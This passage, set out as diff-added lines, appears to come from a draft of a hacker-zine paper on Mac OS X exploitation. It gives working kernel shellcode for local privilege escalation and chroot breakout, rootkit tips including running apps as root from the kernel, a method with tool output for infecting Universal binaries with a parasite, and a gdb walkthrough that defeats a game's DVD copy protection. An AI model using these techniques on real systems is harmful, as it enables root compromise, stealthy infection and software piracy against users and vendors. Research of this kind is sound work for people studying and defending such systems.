+Here is the same output from a PowerPC version of this binary:
+
+	Program received signal SIGTRAP, Trace/breakpoint trap.
+	0x00002018 in trap ()
+	(gdb) x/i $pc
+	0x2018 <trap+4>:        trap
+
+--[ 5 - Writing Kernel level shellcode
+
+In this section we will look at some techniques for writing shellcode
+for use when exploiting kernel level vulnerabilities.
+
+A couple of things to note before we begin. Mac OS X does not share an 
+address space for kernel/user space. Both the kernel and userspace
+have a 4gb address space each (0x0 -> 0xffffffff).
+
+I did not bother with writing PowerPC code again for most of what I've 
+done, if you really want PowerPC code some concepts here will quickly
+port others require a little thought ;).
+
+--[ 5.1 - Local privilege escalation
+
+The first type of kernel shellcode we will look at writing is for
+local vulnerabilities. The typical objective for local kernel
+shellcode is simply to escalate the privileges of our userspace
+process.
+
+This topic was covered in noir's excellent paper on OpenBSD kernel 
+exploitation in Phrack 60. [6]
+
+A lot of the techniques from noir's paper apply directly to Mac OS X.
+noir shows that the sysctl() function can be used to retrieve the  
+kinfo_proc struct for a particular process id. As you can see below
+one of the members of the kinfo_proc struct is a pointer to the proc 
+struct. 
+
+struct kinfo_proc {
+        struct  extern_proc kp_proc;             /* proc structure */
+        struct  eproc {
+                struct  proc *e_paddr;          /* address of proc */
+                struct  session *e_sess;        /* session pointer */
+                struct  _pcred e_pcred;         /* process credentials */
+                struct  _ucred e_ucred;         /* current credentials */
+                struct   vmspace e_vm;          /* address space */
+                pid_t   e_ppid;                 /* parent process id */
+                pid_t   e_pgid;                 /* process group id */
+                short   e_jobc;                 /* job control counter */
+                dev_t   e_tdev;                 /* controlling tty dev */
+                pid_t   e_tpgid;                /* tty process group id */
+                struct  session *e_tsess;       /* tty session pointer */
+#define WMESGLEN        7
+                char    e_wmesg[WMESGLEN+1];    /* wchan message */
+                segsz_t e_xsize;                /* text size */
+                short   e_xrssize;              /* text rss */
+                short   e_xccount;              /* text references */
+                short   e_xswrss;
+                int32_t e_flag;
+#define EPROC_CTTY      0x01    /* controlling tty vnode active */
+#define EPROC_SLEADER   0x02    /* session leader */
+#define COMAPT_MAXLOGNAME       12
+                char e_login[COMAPT_MAXLOGNAME];/* short setlogin() name*/
+                int32_t e_spare[4];
+        } kp_eproc;
+};
+
+Ilja van Sprundel mentioned this technique in his talk at Blackhat [7].
+Basically, we can use the leaked address "p.kp_eproc.ep_addr" to access
+the proc struct for our process in memory.
+
+The following function will return the address of a pid's proc struct 
+in the kernel.
+
+long get_addr(pid_t pid) {
+        int i, sz = sizeof(struct kinfo_proc), mib[4];
+        struct kinfo_proc p;
+        mib[0] = CTL_KERN;
+        mib[1] = KERN_PROC;
+        mib[2] = KERN_PROC_PID;
+        mib[3] = pid;
+        i = sysctl(&mib, 4, &p, &sz, 0, 0);
+        if (i == -1) {
+                perror("sysctl()");
+                exit(0);
+        }
+        return(p.kp_eproc.e_paddr);
+}
+
+Now that we have the address of our proc struct, we simply have to 
+change our uid and/or euid in their respective structures.
+
+Here is a snippet from the proc struct:
+
+struct  proc {
+        LIST_ENTRY(proc) p_list;        /* List of all processes. */
+
+        /* substructures: */
+        struct  ucred *p_ucred;         /* Process owner's identity. */
+        struct  filedesc *p_fd;         /* Ptr to open files structure. */
+        struct   pstats *p_stats; /* Accounting/statistics (PROC ONLY). */
+        struct  plimit *p_limit;        /* Process limits. */
+        struct  sigacts *p_sigacts;
+	/* Signal actions, state (PROC ONLY). */
+	...
+}
+
+As you can see, following the p_list there is a pointer to the 
+ucred struct. This struct is shown below.
+
+struct _ucred {
+        int32_t cr_ref;                 /* reference count */
+        uid_t   cr_uid;                 /* effective user id */
+        short   cr_ngroups;             /* number of groups */
+        gid_t   cr_groups[NGROUPS];     /* groups */
+};
+
+By changing the cr_uid field in this struct, we set the euid of
+our process. 
+
+The following assembly code will seek to this struct and null
+out the ucred cr_uid field. This leaves us with root
+privileges on an Intel platform.
+
+SECTION .text
+_main:  
+        mov     ebx, [0xdeadbeef]       ;# ebx = proc address
+        mov     ecx, [ebx + 8]          ;# ecx = ucred
+        xor     eax,eax
+        mov     [ecx + 12], eax         ;# zero out the euid
+        ret
+
+To use this code we need to replace the address 0xdeadbeef with
+the address of the proc struct which we looked up earlier.
+
+Here is some code from Ilja van Sprundel's talk which does the
+same thing on a PowerPC platform.
+
+int kshellcode[] = { 
+	0x3ca0aabb, // lis r5, 0xaabb 
+	0x60a5ccdd, // ori r5, r5, 0xccdd 
+	0x80c5ffa8, // lwz r6, ­88(r5) 
+	0x80e60048, // lwz r7, 72(r6) 
+	0x39000000, // li r8, 0 
+	0x9106004c, // stw r8, 76(r6) 
+	0x91060050, // stw r8, 80(r6) 
+	0x91060054, // stw r8, 84(r6) 
+	0x91060058, // stw r8, 88(r6) 
+	0x91070004  // stw r8, 4(r7) 
+} 
+
+We can combine the two shellcodes into one architecture 
+spanning shellcode. This is a simple process and is 
+documented in section 4 of this paper.
+
+The full listing for our multi-arch code is shown
+in the Appendix.
+
+On PowerPC processors XNU uses an optimization referred to 
+as the "user memory window". This means that the user address
+space and the kernel address space share some mappings.
+
+This design is in place for copyin/copyout etc to use.
+The user memory window typically starts at 0xe0000000 in both
+the kernel and user address space. This can be useful when 
+trying to position shellcode for use in local privilege 
+escalation vulnerabilities.
+
+--[ 5.2 - Breaking chroot()
+
+Before we look into how we can go about breaking out of
+processes after they have used the chroot() syscall, we 
+will a look at why, a lot of the time, we don't need to.
+
+-[root@fry:/chroot]# touch file_outside_chroot
+
+-[root@fry:/chroot]# ls -lsa file_outside_chroot 
+0 -rw-r--r--   1 root  admin  0 Jan 29 12:17 file_outside_chroot
+
+-[root@fry:/chroot]# chroot demo /bin/sh
+
+-[root@fry:/]# ls -lsa file_outside_chroot
+ls: file_outside_chroot: No such file or directory
+
+-[root@fry:/]# pwd                        
+/
+
+-[root@fry:/]# ls -lsa ../file_outside_chroot
+0 -rw-r--r--   1 root  admin  0 Jan 29 20:17 ../file_outside_chroot
+
+-[root@fry:/]# ../../usr/sbin/chroot ../../ /bin/sh
+
+-[root@fry:/]# ls -lsa /chroot/file_outside_chroot 
+0 -rw-r--r--   1 root  admin  0 Jan 29 12:17 /chroot/file_outside_chroot
+
+As you can see, the /usr/sbin/chroot command which ships
+with Mac OS X does not chdir() and therefore does not 
+really do very much at all.
+
+The author suggests the following addition be made to the
+chroot man page on Mac OS X:
+
+	"Caution: Does not work."
+
+On an unrelated note, this patch would also be suitable for
+the setreuid() man page.
+
+I won't spend too much time on this since noir already 
+covered it really well in his paper. [6]
+
+Basically as noir mentions, all we need to do to break our 
+process out of the chroot() is to set the p->p_fd->fd_rdir
+element in our proc struct to NULL.
+
+We can get the address of our proc struct using sysctl as
+mentioned earlier.
+
+noir already provides us with the instructions for this:
+
+mov	edx,[ecx + 0x14] 	;# edx = p->p_fd
+mov	[edx + 0xc],eax		;# p->p_fd->fd_rdir = 0
+
+
+--[ 5.3 -  Advancements 
+
+Now that we are familiar with writing shellcode for use
+in local exploits, where we already have local access to 
+the box, the rest of the kernel related code in this paper
+will focus on accomplishing it's task without any userspace 
+access required. 
+
+In order to do this, we can utilize the per cpu/task/proc/ 
+and thread structures in the kernel. The definitions for 
+each of these structures can be found in the osfmk/kern 
+and bsd/sys/ directories in various header files.
+
+The first struct which we will look at is the "cpu_data"
+struct found in osfmk/i386/cpu_data.h.
+
+I have included the definition for this struct below:
+
+/*
+ * Per-cpu data.
+ *   
+ * Each processor has a per-cpu data area which is dereferenced through the
+ * using this, in-lines provides single-instruction access to frequently 
+ * used members - such as get_cpu_number()/cpu_number(), and 
+ * get_active_thread()/ current_thread(). 
+ * 
+ * Cpu data owned by another processor can be accessed using the
+ * cpu_datap(cpu_number) macro which uses the cpu_data_ptr[] array of 
+ * per-cpu pointers.
+ */
+typedef struct cpu_data
+{
+        struct cpu_data         *cpu_this;        /* pointer to myself */
+        thread_t                cpu_active_thread;
+        void                    *cpu_int_state;     /* interrupt state */
+        vm_offset_t             cpu_active_stack;  /* kernel stack base */
+        vm_offset_t             cpu_kernel_stack;  /* kernel stack top */
+        vm_offset_t             cpu_int_stack_top;
+        int                     cpu_preemption_level;
+        int                     cpu_simple_lock_count;
+        int                     cpu_interrupt_level;
+        int                     cpu_number;             /* Logical CPU */
+        int                     cpu_phys_number;        /* Physical CPU */
+        cpu_id_t                cpu_id;              /* Platform Expert */
+        int                     cpu_signals;            /* IPI events */
+        int                     cpu_mcount_off;    /* mcount recursion */
+        ast_t                   cpu_pending_ast;
+        int                     cpu_type;
+        int                     cpu_subtype;
+        int                     cpu_threadtype;
+        int                     cpu_running;
+        uint64_t                rtclock_intr_deadline;
+        rtclock_timer_t         rtclock_timer;
+        boolean_t               cpu_is64bit;
+        task_map_t              cpu_task_map;
+        addr64_t                cpu_task_cr3;
+        addr64_t                cpu_active_cr3;
+        addr64_t                cpu_kernel_cr3;
+        cpu_uber_t              cpu_uber;
+        void                    *cpu_chud;
+        void                    *cpu_console_buf;
+        struct cpu_core         *cpu_core;         /* cpu's parent core */
+        struct processor        *cpu_processor;
+        struct cpu_pmap         *cpu_pmap;
+        struct cpu_desc_table   *cpu_desc_tablep;
+        struct fake_descriptor  *cpu_ldtp;
+        cpu_desc_index_t        cpu_desc_index;
+        int                     cpu_ldt;
+#ifdef MACH_KDB
+        /* XXX Untested: */
+        int                     cpu_db_pass_thru;
+        vm_offset_t     cpu_db_stacks;
+        void            *cpu_kdb_saved_state;
+        spl_t           cpu_kdb_saved_ipl;
+        int                     cpu_kdb_is_slave;
+        int                     cpu_kdb_active;
+#endif /* MACH_KDB */
+        boolean_t               cpu_iflag;
+        boolean_t               cpu_boot_complete;
+        int                     cpu_hibernate;
+        pmsd                    pms; /* Power Management Stepper control */
+        uint64_t            rtcPop; /* when the etimer wants a timer pop */
+
+        vm_offset_t     cpu_copywindow_bas;
+        uint64_t        *cpu_copywindow_pdp;
+
+        vm_offset_t     cpu_physwindow_base;
+        uint64_t        *cpu_physwindow_ptep;
+        void            *cpu_hi_iss;
+        boolean_t       cpu_tlb_invalid;
+
+        uint64_t        *cpu_pmHpet; 
+	/* Address of the HPET for this processor */
+        uint32_t        cpu_pmHpetVec;  
+	/* Interrupt vector for HPET for this processor */
+/*      Statistics */
+        pmStats_t       cpu_pmStats;  
+	/* Power management data */
+        uint32_t        cpu_hwIntCnt[256];         /* Interrupt counts */
+
+        uint64_t                cpu_dr7; /* debug control register */
+} cpu_data_t;
+
+As you can see, this structure contains valuable information 
+for our shellcode running in the kernel. We just need to 
+figure out how to access it.
+
+The following macro shows how we can access this structure.
+
+/* Macro to generate inline bodies to retrieve per-cpu data fields. */
+#define offsetof(TYPE,MEMBER) ((size_t) &((TYPE *)0)->MEMBER)
+#define CPU_DATA_GET(member,type)                                       \
+        type ret;                                                       \
+        __asm__ volatile ("movl %%gs:%P1,%0"                            \
+                : "=r" (ret)                                            \
+                : "i" (offsetof(cpu_data_t,member)));                   \
+        return ret;
+
+When our code is executing in kernel space the gs selector can be used
+to access our cpu_data struct. The first element of this struct
+contains a pointer to the struct itself, so we no longer need to
+use gs after this.
+
+The first objective we will look at is the ability to find the
+init process (pid=1) via this struct. Since our code may not
+be running with an associated user space thread, we cannot count
+on the uthread struct being populated in our thread_t struct.
+An example of this might be when we exploit a network stack or
+kernel extension.
+
+The first step we must make to find the init process struct
+is to retrieve the pointer to our thread_t struct.
+
+We can do this by simply retrieving the pointer at gs:0x04.
+The following instructions will achieve this:
+
+_main:  
+        xor     ebx,ebx				;# zero ebx
+        mov     eax,[gs:0x04 + ebx]             ;# thread_t.
+
+After these instructions are executed, we have a pointer to 
+our thread struct in eax. The thread struct is defined in 
+osfmk/kern/thread.h. A portion of this struct is shown below:
+
+struct thread {
+...
+        queue_chain_t   links;          /* run/wait queue links */
+        run_queue_t     runq;   /* run queue thread is on SEE BELOW */
+        wait_queue_t    wait_queue;  /* wait queue we are currently on */
+        event64_t               wait_event;       /* wait queue event */
+        integer_t               options;/* options set by thread itself */
+...
+  /* Data used during setrun/dispatch */
+        timer_data_t            system_timer;  /* system mode timer */
+        processor_set_t         processor_set;/* assigned processor set */
+        processor_t bound_processor; /* bound to a processor? */
+        processor_t last_processor;     /* processor last dispatched on */
+        uint64_t    last_switch;        /* time of last context switch */
+...
+	void                                    *uthread;
+#endif
+};
+
+This struct, again, contains many fields which are useful 
+for our shellcode. However, in this case we are trying to
+find the proc struct. Because we might not necessarily 
+already have a uthread associated with us, as mentioned 
+earlier, we must look elsewhere for a list of tasks to 
+locate init (launchd). 
+
+The next step in this process is to retrieve the 
+"last_processor" element from our thread_t struct.
+We do this using the following instructions: 
+
+        mov     bl,0xf4
+        mov     ecx,[eax + ebx]                 ;# last_processor
+
+The last_processor pointer points to a processor 
+struct as the name suggests ;) We can walk from the
+last_processor struct back to the default pset in 
+order to find the pset which contains init.
+
+        mov     eax,[ecx]                       ;# default_pset + 0xc
+
+We then retrieve the task head from this struct.
+
+        push    word 0x458
+        pop     bx
+        mov     eax,[eax + ebx]                 ;# tasks head.
+
+And retrieve the bsd_info element of the task.
+This is a proc struct pointer.
+
+        push    word 0x19c
+        pop     bx
+        mov     eax,[eax + ebx]                 ;# get bsd_info
+
+The proc struct is defined in xnu/bsd/sys/proc_internal.h.
+The first element of the proc struct is:
+
+        LIST_ENTRY(proc) p_list;        /* List of all processes. */
+
+We can walk this list o find a particular process that we want. 
+For most of our code we will start with a pointer to the init 
+process (launchd on Mac OS X). This process has a pid of 1.
+
+To find this we simply walk the list checking the pid field 
+at offset 36. The code to do this is as follows:
+
+next_proc:
+        mov     eax,[eax+4]                     ;# prev         
+        mov     ebx,[eax + 36]                  ;# pid
+        dec     ebx
+        test    ebx,ebx                         ;# if pid was 1
+        jnz     next_proc
+done:
+;#      eax = struct proc *init;
+
+Now that we have developed code which will retrieve a pointer
+to the proc struct for the init process, we can look at some 
+of the things that we can accomplish using this pointer.
+
+The first thing which we will look at is simply rewriting the 
+privilege escalation code listed earlier. Our new version of 
+this code will not require any help from userspace (sysctl etc).
+
+I think the below code is fairly self explanatory.
+
+%define PID 1337
+
+find_pid:
+        mov     eax,[eax + 4]                   ;# eax = next proc
+        mov     ebx,[eax + 36]                  ;# pid
+        cmp     bx,PID
+        jnz     find_pid
+        mov     ecx, [eax + 8]          ;# ecx = ucred
+        xor     eax,eax
+        mov     [ecx + 12], eax         ;# zero out the euid
+
+As you can see the cpu_data struct opens up many possibilities 
+for our shellcode. Hopefully I will have time to go into some 
+of these in a future paper.
+
+--[ 6 - Misc Rootkit Techniques
+
+In this section I will run over a few short pieces of 
+information which might be relevant to someone who is 
+developing a rootkit for Mac OS X. I didn't really have 
+another place to put this stuff, so this will have to do.
+
+The first thing to note is that an API exists [21] for 
+executing userspace applications from kernelspace. This 
+is called the Kernel User Notification Daemon. This is 
+implemented using a mach port which the kernel uses to 
+communicate  with a userspace daemon named kuncd.
+
+The file xnu/osfmk/UserNotification/UNDRequest.defs 
+contains the Mach Interface Generator (MIG) interface
+definitions for the communication with this daemon.
+
+The mach port is called: 
+"com.apple.system.Kernel[UNC]Notifications" and is
+registered by the daemon /usr/libexec/kuncd.
+
+Here is an example of how to use this interface 
+programmatically. The interface allows you to display
+messages via the GUI to the user, and also run any 
+application.
+
+kern_return_t ret;
+ret = KUNCExecute(
+	"/Applications/TextEdit.app/Contents/MacOS/TextEdit", 
+	kOpenAppAsRoot,
+	kOpenApplicationPath
+);
+ret = KUNCExecute(
+	"Internet.prefPane", 
+	kOpenAppAsConsoleUser, 
+	kOpenPreferencePanel
+);
+
+There may be a situation where you wish code to be executed on all the 
+processors on a system. This may be something like updating the IDT / MSR 
+and not wanting a processor to miss out on it.
+
+The xnu kernel provides a function for this. The comment and prototype 
+explain this a lot better than I can. So here you go:
+
+/*
+ * All-CPU rendezvous:
+ *      - CPUs are signalled,
+ *      - all execute the setup function (if specified),
+ *      - rendezvous (i.e. all cpus reach a barrier),
+ *      - all execute the action function (if specified),
+ *      - rendezvous again,
+ *      - execute the teardown function (if specified), and then
+ *      - resume.
+ *
+ * Note that the supplied external functions _must_ be reentrant and aware
+ * that they are running in parallel and in an unknown lock context.
+ */
+
+void
+mp_rendezvous(void (*setup_func)(void *),
+              void (*action_func)(void *),
+              void (*teardown_func)(void *),
+              void *arg)
+{
+
+The code for the functions related to this are stored in 
+xnu/osfmk/i386/mp.c.
+
+--[ 7 - Universal Binary Infection
+
+[SINCE YOU CHAT A BIT ABOUT MACH-O HERE, MAYBE MOVE THIS SECTION
+TO SOMEWHERE EARLIER IN THE PAPER?  YOU CAN EXPAND A LITTLE AND 
+IT MIGHT MAKE THE LINKEDIT / LC_SYMTAB ETC SECTION MORE CLEAR AS
+YOU ALSO GO INTO THE MAGIC NUMER MUMBO-JUMBO HERE AS WELL]
+The Mach-O object format is used on operating systems which have
+a kernel based on Mach. This is the format which is used by 
+Mac OS X. Significant work has already been done regarding the
+infection of this format. The papers [12] and [13] show some of
+this. Mach-O files can be identified by the first four bytes of 
+the file which contain the magic number 0xfeedface.
+
+Recently Mac OS X has moved from the PowerPC platform to Intel 
+architecture. This move has caused a new binary format to be 
+used for most of the applications on Mac OS X 10.4. The Universal
+Binary format is defined in the Mach-O Runtime reference from 
+Apple. [4].
+
+The Universal Binary format is a fairly trivial archive format
+which allows for multiple Mach-O files of varying architecture
+types to be stored in a single file. The loader on Mac OS X is 
+able to interpret this file and distinguish which of the Mach-O
+files inside the archive matches the architecture type of the 
+current system. (We'll look at this a little more later.)
+
+The structures used by Mac OS X to define and parse Universal
+binaries are contained in the file /usr/include/mach-o/fat.h.
+
+Universal binaries are recognizable, again, by the magic number
+in the first four bytes of the file. Universal binaries begin 
+with the following header:
+
+struct fat_header {
+	uint32_t        magic;          /* FAT_MAGIC */
+	uint32_t        nfat_arch;      /* number of structs that follow */
+};
+
+The magic number on a universal binary is as follows:
+
+#define FAT_MAGIC       0xcafebabe
+#define FAT_CIGAM       0xbebafeca      /* NXSwapLong(FAT_MAGIC) */
+
+Either FAT_MAGIC or FAT_CIGAM is used depending on the endian of
+the file/system.
+
+The nfat_arch field of this structure contains the number of 
+Mach-O files of which the archive is comprised. On a side note
+if you set this high enough to wrap, just about every debugging
+tool on Mac OS X will crash, as demonstrated below:
+
+-[nemo@fry:~]$ printf "\xca\xfe\xba\xbe\x66\x66\x66\x66" > file
+-[nemo@fry:~]$ otool -tv file
+Segmentation fault
+
+For each of the Mach-O files in the Universal binary there 
+is also a fat_arch structure.
+
+This structure is shown below:
+
+struct fat_arch {
+        cpu_type_t      cputype;     /* cpu specifier (int) */
+        cpu_subtype_t   cpusubtype;  /* machine specifier (int) */
+        uint32_t        offset;      /* file offset to this object file */
+        uint32_t        size;        /* size of this object file */
+        uint32_t        align;       /* alignment as a power of 2 */
+};
+
+The fat_arch structure defines the architecture type of the
+Mach-O file, as well as the offset into the Universal binary
+in which it is stored. It also contains the alignment of the
+architecture for the particular file, expressed as a power
+of 2.
+
+The diagram below describes the layout of a typical Universal
+binary:
+[YOU SWITCH CAPITALIZATION OF UNIVERSAL QUITE OFTEN IN THIS SECTION]
+
+._________________________________________________,
+|0xcafebabe                                       |
+|   struct fat_header                             |
+|-------------------------------------------------|
+| fat_arch struct #1                              |------------+
+|-------------------------------------------------|            |
+| fat_arch struct #2                              |---------+  |
+|-------------------------------------------------|         |  |
+| fat_arch struct #n                              |------+  |  |
+|-------------------------------------------------|<-----------+
+|0xfeedface                                       |      |  |
+|                                                 |      |  |
+|    Mach-O File #1                               |      |  |
+|                                                 |      |  |
+|                                                 |      |  |
+|-------------------------------------------------|<--------+  
+|0xfeedface                                       |      |
+|                                                 |      |
+|    Mach-O File #2                               |      |
+|                                                 |      |
+|                                                 |      |
+|-------------------------------------------------|<-----+
+|0xfeedface                                       |
+|                                                 |
+|    Mach-O file #n                               |
+|                                                 |
+|                                                 |
+'-------------------------------------------------'
+
+Here you can see the file beginning with a fat_header
+structure. Following this are n * fat_arch structures
+each defining the offset into the file to find the
+particular Mach-O file described by the structure.
+Finally n * Mach-O files are appended to the structs.
+
+Before I run through the method for infecting Universal
+binaries I will first show how the kernel loads them.
+
+The file:  xnu/bsd/kern/kern_exec.c contains the code
+shown in this section.
+
+First the kernel sets up a NULL terminated array of 
+execsw structs.  Each of these structures contain a 
+function pointer to an  image activator / parser for 
+the different image types, as well as a relevant string 
+description.
+
+The definition and declaration of this array is shown 
+below:
+
+/*
+ * Our image activator table; this is the table of the image types we are
+ * capable of loading.  We list them in order of preference to ensure the
+ * fastest image load speed.
+ *
+ * XXX hardcoded, for now; should use linker sets
+ */
+struct execsw {
+        int (*ex_imgact)(struct image_params *);
+        const char *ex_name;
+} execsw[] = {
+        { exec_mach_imgact,             "Mach-o Binary" },
+        { exec_fat_imgact,              "Fat Binary" },
+#ifdef IMGPF_POWERPC
+        { exec_powerpc32_imgact,        "PowerPC binary" },
+#endif  /* IMGPF_POWERPC */
+        { exec_shell_imgact,            "Interpreter Script" },
+        { NULL, NULL}
+};
+
+The following code from the execve() system call loops 
+through each of the elements in this array and calls 
+the function pointer for each one. A pointer to the 
+start of the image is passed to it. 
+
+int
+execve(struct proc *p, struct execve_args *uap, register_t *retval)
+{
+	...
+
+        for(i = 0; error == -1 && execsw[i].ex_imgact != NULL; i++) {
+
+                error = (*execsw[i].ex_imgact)(imgp);
+
+
+Each of the functions parses the file to determine
+if the file is of the appropriate architecture type.
+The function which is responsible for matching and
+parsing Universal binaries is the "exec_fat_imgact"
+function.
+
+The declaration of this function is below:
+
+/*
+ * exec_fat_imgact
+ *
+ * Image activator for fat 1.0 binaries.  If the binary is fat, then we
+ * need to select an image from it internally, and make that the image
+ * we are going to attempt to execute.  At present, this consists of
+ * reloading the first page for the image with a first page from the
+ * offset location indicated by the fat header.
+ *
+ * Important:   This image activator is byte order neutral.
+ *
+ * Note:    If we find an encapsulated binary, we make no assertions
+ *          about its  validity; instead, we leave that up to a rescan
+ *          for an activator to claim it, and, if it is claimed by one,
+ *          that activator is responsible for determining validity.
+ */
+static int
+exec_fat_imgact(struct image_params *imgp)
+
+The first thing this function does is test the 
+magic number at the top of the file. The following
+code does this.
+
+        /* Make sure it's a fat binary */
+        if ((fat_header->magic != FAT_MAGIC) &&
+            (fat_header->magic != FAT_CIGAM)) {
+                error = -1;
+                goto bad;
+        }
+
+The fatfile_getarch_affinity() function is then 
+called to search the universal binary for a 
+Mach-O file with the appropriate architecture 
+type for the system.
+
+   /* Look up our preferred architecture in the fat file. */
+        lret = fatfile_getarch_affinity(imgp->ip_vp,
+                                        (vm_offset_t)fat_header,
+                                        &fat_arch,
+                                        (p->p_flag & P_AFFINITY));
+
+This function is defined in the file: 
+xnu/bsd/kern/mach_fat.c. 
+
+	load_return_t
+	fatfile_getarch_affinity(
+                struct vnode            *vp,
+                vm_offset_t             data_ptr,
+                struct fat_arch *archret,
+                int                             affinity)
+
+This function searches each of the Mach-O files within the 
+Universal binary. A host has a primary and secondary architecture. 
+If during this search, a Mach-O file is found which matches
+the primary architecture type for the host, this file is 
+used. If, however, the primary architecture type is not 
+found, yet the secondary type is found, this will be used.
+This is useful when infecting this format.
+
+Once an appropriate Mach-O file has been located the imgp
+ip_arch_offset and ip_arch_size attributes are updated to
+reflect the new position in the file.
+
+/* Success.  Indicate we have identified an encapsulated binary */
+error = -2;
+imgp->ip_arch_offset = (user_size_t)fat_arch.offset;
+imgp->ip_arch_size = (user_size_t)fat_arch.size;
+
+After this fatfile_getarch_affinity() simply returns and lets
+execve() continue walking the execsw[] struct array to find 
+an appropriate loader for the new file.
+
+This logic means that it does not really matter if the 
+true architecture type of the file matches up with the 
+architecture specified in the fat_header struct within
+the Universal binary. Once a Mach-O file is chosen it will
+be treated as a fresh binary.
+
+The method which I propose to infect Universal binaries 
+utilizes this behavior. A breakdown of this method is
+as follows:
+
+1) Determine the primary and secondary architecture types
+   for the host machine.
+2) Parse the fat_header struct of the host binary.
+3) Walk through the fat_arch structs and locate the 
+   struct for the secondary architecture type.
+4) Check that the size of the parasite is smaller than the 
+   secondary architecture Mach-O file in the Universal binary.
+5) Copy the parasite binary directly over the secondary arch
+   binary inside the universal binary.
+6) Locate the primary architecture's fat_arch structure.
+7) Modify the architecture type field in this structure to be
+   0xdeadbeef.
+
+Now when the binary is executed, the primary architecture 
+is not found. Due to this, the secondary architecture is 
+used. The imgp is set to point to the offset in the file
+containing our parasite, and this is executed as expected.
+The parasite then opens it's own binary (which is quite 
+possible on Mac OS X) and performs a linear search for 
+0xdeadbeef. It then modifies this value, changing it back
+to the primary architecture type and execve()'s it's own file.
+
+Some sample code has been provided with this paper that 
+demonstrates this method on Intel architecture. The code 
+unipara.c will copy an Intel architecture Mach-O file
+over the PowerPC Mach-O file inside a Universal binary.
+After infection has occurred the size of the host file
+remains unchanged.
+
+-[nemo@fry:~/code/unipara]$ ./unipara host parasite
+-[nemo@fry:~/code/unipara]$ ./host
+uid=501(nemo) gid=501(nemo) 
+-[nemo@fry:~/code/unipara]$ wc -c host
+   43028 host
+-[nemo@fry:~/code/unipara]$ ./unipara parasite host
+[+] Initiating infection process.
+[+] Found: 2 arch structs.
+[+] We are good to go, attaching parasite.
+[+] parasite implanted at offset: 0x6000
+[+] Switching arch types to execute our parasite.
+-[nemo@fry:~/code/unipara]$ wc -c host
+   43028 host
+-[nemo@fry:~/code/unipara]$ ./host
+Hello, World!
+uid=501(nemo) gid=501(nemo) 
+
+If residency is required after the payload has already been
+executed, the parasite can simply fork() before modifying 
+it's binary. The parent process can then execve() while the child
+waits and then returns the architecture type to 0xdeadbeef.
+
+--[ 8 - Cracking Example - Prey
+
+Recently, during an extra long stopover in LAX airport (the most
+boring airport in the entire world) I decided I would pass the 
+time by playing the game "Prey" which I had installed onto my 
+laptop.
+
+To my horror, when I tried to start up my game, I was greeted 
+with the following error message:
+
+"Please insert the disc "Prey" or press Quit."
+"Veuillez inserer le disque "Prey" ou appuyer sur Quitter."
+"Bitte legen Sie "Prey" ins Laufwerk ein oder klicken Sie
+auf Beenden."
+
+Since I had nothing better to do, I decided to spend some 
+time removing this error message. First things first I
+determined the object format of the executable file.
+
+-[nemo@fry:/Applications/Prey/Prey.app/Contents/MacOS]$ file Prey
+Prey: Mach-O universal binary with 2 architectures
+Prey (for architecture ppc):    Mach-O executable ppc
+Prey (for architecture i386):   Mach-O executable i386
+
+The Prey executable is a Universal binary containing a 
+PowerPC and an i386 Mach-O binary. 
+
+Next I ran the otool -o command to determine if the code
+was written in Objective-C. The output from this command
+shows that an Objective-C segment is present in the file.
+
+-[nemo@largeprompt]$ otool -o Prey | head -n 5
+Prey:
+Objective-C segment
+Module 0x27ef458
+    version 6
+           size 16
+
+I then used the "class-dump" command [14] to dump the 
+class definitions from the file. Probably the most
+interesting of which is shown below:
+
+	@interface DOOMController (Private)
+	- (void)quakeMain;
+	- (BOOL)checkRegCodes;
+	- (BOOL)checkOS;
+	- (BOOL)checkDVD;
+	@end
+
+Most games on Mac OS X are 10 years behind their Windows
+counterparts when it comes to copy protection. Typically
+the developers don't even strip the file and symbols are 
+still present. Because of this fact, I fired up gdb and 
+put a breakpoint on the main function.
+
+	(gdb) break main
+	Breakpoint 1 at 0x96b64
+
+However when I executed the file the error message was
+displayed prior to my breakpoint in main being reached.
+This lead me to the conclusion that a constructor 
+function was responsible for check. 
+
+To validate this theory I ran the command "otool -l" on
+the binary to list the load commands present in the file.
+(The Mach-O Runtime Document [4] explains the load_command
+struct clearly).
+
+Each section in the Mach-O file has a "flags" value 
+associated with it. This describes the purpose of the 
+section. Possible values for this flags variable are
+found in the file: /usr/include/mach-o/loader.h.
+
+The value which represents a constructor section is 
+defined as follows:
+
+/* section with only function pointers for initialization*/
+#define S_MOD_INIT_FUNC_POINTERS        0x9     
+
+Looking through the "otool -l" output there is only one
+section which has the flags value: 0x9. This section is
+shown below:
+
+Section
+  sectname __mod_init_func
+   segname __DATA
+      addr 0x00515cec
+      size 0x00000380
+    offset 5328108
+     align 2^2 (4)
+    reloff 0
+    nreloc 0
+     flags 0x00000009
+ reserved1 0
+ reserved2 0
+
+Now that the virtual address of the constructor section
+for this application was known, I simply fired up gdb
+again and put breakpoints on each of the pointers 
+contained in this section.
+
+(gdb) x/x 0x00515cec
+0x515cec <_ZTI14idSIMD_Generic+12>:     0x028cc8db
+(gdb) 
+0x515cf0 <_ZTI14idSIMD_Generic+16>:     0x00495852
+(gdb) 
+0x515cf4 <_ZTI14idSIMD_Generic+20>:     0x0049587c
+...
+
+(gdb) break *0x028cc8db
+Breakpoint 1 at 0x28cc8db
+(gdb) break *0x00495852
+Breakpoint 2 at 0x495852
+(gdb) break *0x0049587c
+Breakpoint 3 at 0x49587c
+...
+
+I then executed the program. As expected the first break point
+was hit before the error message box was displayed.
+
+(gdb) r
+Starting program: /Applications/Prey/Prey.app/Contents/MacOS/Prey 
+
+Breakpoint 1, 0x028cc8db in dyld_stub_log10f ()
+(gdb) continue
+
+I then continued execution and the error message appeared. This
+happened before the second breakpoint was reached. This indicated
+that the first pointer in the __mod_init_func was responsible for 
+the DVD checking process.
+
+In order to validate my theory I restarted the process. This time 
+I deleted all breakpoints except the first one.
+
+(gdb) delete
+Delete all breakpoints? (y or n) y
+(gdb) break *0x028cc8db
+Breakpoint 4 at 0x28cc8db
+
+(gdb) r
+Starting program: /Applications/Prey/Prey.app/Contents/MacOS/Prey 
+Reading symbols for shared libraries . done
+
+Once the breakpoint is reached, I simply "return" from the 
+constructor, without testing for the DVD.
+
+
+Breakpoint 4, 0x028cc8db in dyld_stub_log10f ()
+(gdb) ret
+Make selected stack frame return now? (y or n) y
+#0  0x8fe0fcc4 in  _dyld__ZN16ImageLoaderMachO16doInitialization... ()
+And then continue execution.
+
+(gdb) c
+
+The error message was gone and Prey started up as if the DVD 
